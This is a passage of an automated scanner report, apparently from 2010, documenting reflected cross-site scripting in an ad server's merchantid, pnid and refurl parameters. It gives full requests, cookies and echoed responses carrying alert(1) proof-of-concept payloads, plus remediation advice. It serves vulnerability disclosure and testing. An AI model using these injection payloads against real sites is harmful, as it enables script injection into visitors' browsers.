Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:03 GMT Expires: Fri, 26 Nov 2010 20:47:03 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=1000193076"-alert(1)-"08bdf57445f&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D154094 ...[SNIP]...
The value of the merchantid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ddd2"-alert(1)-"20efc82a0ef was submitted in the merchantid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=32500099208ddd2"-alert(1)-"20efc82a0ef&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:05 GMT Expires: Fri, 26 Nov 2010 20:47:05 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... /f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=32500099208ddd2"-alert(1)-"20efc82a0ef&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%2 ...[SNIP]...
The value of the merchantid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 792de'-alert(1)-'012f9b341 was submitted in the merchantid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920792de'-alert(1)-'012f9b341&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7195 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:06 GMT Expires: Fri, 26 Nov 2010 20:47:06 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... /f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920792de'-alert(1)-'012f9b341&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%2 ...[SNIP]...
The value of the pnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dc11"-alert(1)-"d64d46de908 was submitted in the pnid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=05dc11"-alert(1)-"d64d46de908&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:01 GMT Expires: Fri, 26 Nov 2010 20:47:01 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... ck.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=05dc11"-alert(1)-"d64d46de908&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation ...[SNIP]...
The value of the pnid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28f31'-alert(1)-'8c939112a09 was submitted in the pnid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=028f31'-alert(1)-'8c939112a09&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:01 GMT Expires: Fri, 26 Nov 2010 20:47:01 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... ck.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=028f31'-alert(1)-'8c939112a09&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation ...[SNIP]...
The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77fe9'-alert(1)-'f21f4be48e2 was submitted in the refurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom77fe9'-alert(1)-'f21f4be48e2&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7201 Cache-Control: no-cache Pragma: no-cache Date: Fri, 26 Nov 2010 20:47:17 GMT Expires: Fri, 26 Nov 2010 20:47:17 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... g%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom77fe9'-alert(1)-'f21f4be48e2&rurl=http%3a%2f%2fwww.overstock.com"> ...[SNIP]...
The value of the refurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d42f2"-alert(1)-"5cae220f39b was submitted in the refurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecomd42f2"-alert(1)-"5cae220f39b&rurl=;ord=[timestamp]? HTTP/1.1 Host: ad.vulnerable.ad.partner Proxy-Connection: keep-alive Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 